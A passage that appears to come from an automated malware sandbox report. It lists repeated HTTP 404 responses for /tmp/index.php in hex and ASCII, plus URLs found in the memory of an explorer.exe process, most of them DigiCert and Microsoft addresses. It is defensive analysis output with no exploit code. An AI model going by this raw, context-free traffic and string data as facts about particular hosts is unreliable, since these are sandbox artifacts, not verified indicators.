      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:02:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:03:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:03:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:03:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:03:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:03:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:03:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:03:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:03:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:03:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 14 Oct 2024 08:03:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: explorer.exe, 00000001.00000000.1775499027.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777648899.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.0000000008121000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.00000000080F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
      Source: explorer.exe, 00000001.00000000.1775499027.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777648899.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.0000000008121000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.00000000080F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
      Source: explorer.exe, 00000001.00000000.1775499027.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777648899.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.0000000008121000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.00000000080F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
      Source: explorer.exe, 00000001.00000000.1775499027.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1777648899.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.0000000008121000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.00000000080F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
      Source: explorer.exe, 00000001.00000000.1775499027.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
      Source: explorer.exe, 00000001.00000000.1776956653.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1776433497.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1778850538.0000000009B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: explorer.exe, 00000001.00000000.1780555667.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
      Source: explorer.exe, 00000001.00000000.1775499027.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2958316286.000000000482E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
      Source: explorer.exe, 00000001.00000000.1775499027.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
      Source: explorer.exe, 0000000B.00000002.2958316286.000000000482E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmv
      Source: explorer.exe, 00000001.00000000.1780555667.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 00000001.00000000.1777648899.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2687754083.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2963794054.0000000008219000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2698899331.0000000008235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008246000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2678793618.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2680525283.0000000008278000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2670022683.000000000823B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008317000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2702926545.0000000008236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
